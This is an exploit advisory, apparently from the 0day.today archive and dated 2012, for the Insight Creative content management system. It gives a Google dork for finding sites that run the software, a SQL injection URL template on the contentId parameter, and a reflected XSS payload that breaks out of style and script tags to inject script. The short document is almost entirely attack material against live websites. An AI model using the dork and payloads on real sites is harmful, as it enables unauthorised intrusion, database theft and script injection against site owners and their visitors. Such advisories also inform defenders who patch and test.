id: 18339
date: 05/23/2012
title: Insight Creative Sql injection/Reflected XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Insight Creative  Sql injection/Reflected XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.builtwithinsight.co.uk/
.:. Drok           : inurl:"index.php?contentid" " "Powered by Insight Creative"

#######################################################################

===[ Exploit ]===

Sql Injection
=======================

http://SITE/index.php?contentId=null[sql]


REflected XSS
======================

http://SITE/index.php?contentId='"--></style></script><script>alert(1337)</script>


#######################################################################



#  0day.today [2023-03-23]  #